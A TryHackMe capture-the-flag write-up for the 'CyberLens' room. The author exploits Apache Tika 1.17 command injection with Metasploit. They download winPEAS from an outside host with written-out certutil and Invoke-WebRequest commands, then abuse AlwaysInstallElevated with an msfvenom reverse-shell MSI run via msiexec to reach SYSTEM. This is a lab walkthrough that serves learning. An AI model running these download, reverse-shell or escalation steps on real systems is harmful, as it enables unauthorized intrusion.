---
# System prepended metadata

title: THM-CyberLens
tags: [TryHackMe]

---

# THM-CyberLens
![image](https://hackmd.io/_uploads/rkkiTxiAle.png)
![image](https://hackmd.io/_uploads/H1_XRgj0lg.png)
![image](https://hackmd.io/_uploads/BJAL0gs0ge.png)
Scrolling down the web page we can see a file upload.
![image](https://hackmd.io/_uploads/ryRl1-o0gg.png)
I checked the source code to see how it works but stumbled into something interesting.
![image](https://hackmd.io/_uploads/rJOGyWs0gx.png)
You can see there is another website on port 61777.
![image](https://hackmd.io/_uploads/ryRDJ-i0gl.png)
It’s running [Apache Tika 1.17](https://www.exploit-db.com/exploits/47208). A quick search on google reveals that this version is vulnerable to command injection. 
I use metasploit to get shell
![image](https://hackmd.io/_uploads/rJyXfWiAeg.png)
![image](https://hackmd.io/_uploads/S13Nf-j0lg.png)
![image](https://hackmd.io/_uploads/HyHBf-iRll.png)
I use shell to create cmd
![image](https://hackmd.io/_uploads/Sy4M7ZoRxl.png)
![image](https://hackmd.io/_uploads/HJ1BXbiRgx.png)
I upload winpeas to target machine
```
certutil -urlcache -f http://10.6.4.204:1234/winPEAS.exe winpeas.exe
Invoke-WebRequest -Uri http://10.6.4.204:1234/winPEAS.exe -OutFile winpeas.exe
```
![image](https://hackmd.io/_uploads/ryw0BbiAgg.png)
![image](https://hackmd.io/_uploads/r1rkIZo0ex.png)
![image](https://hackmd.io/_uploads/HJ4QUWoCxx.png)
I find an interesting result is AlwaysInstallElevated. AlwaysInstallElevated is a setting in Windows policy that permits the Windows Installer packages (.msi files) to be installed with administrative privileges.
![image](https://hackmd.io/_uploads/SyAtK-iRge.png)
Lets check about it in internet, i find [this blog](https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/) have method to root
I use msfvenom to create .msi file to make revshell
![image](https://hackmd.io/_uploads/SyYLcbsAgg.png)
I upload file to target machine
![image](https://hackmd.io/_uploads/Bk0T9-oRll.png)
![image](https://hackmd.io/_uploads/B1U0cboCeg.png)
After upload file, i run command `msiexec /quiet /qn /i ignite.msi` to execute the file ignite.msi and make sure use nc to catch the revshell
![image](https://hackmd.io/_uploads/SJL7ibsCex.png)
I have gained SYSTEM privileges on the target, meaning now i can do anything i want
![image](https://hackmd.io/_uploads/H1I_jbsAlg.png)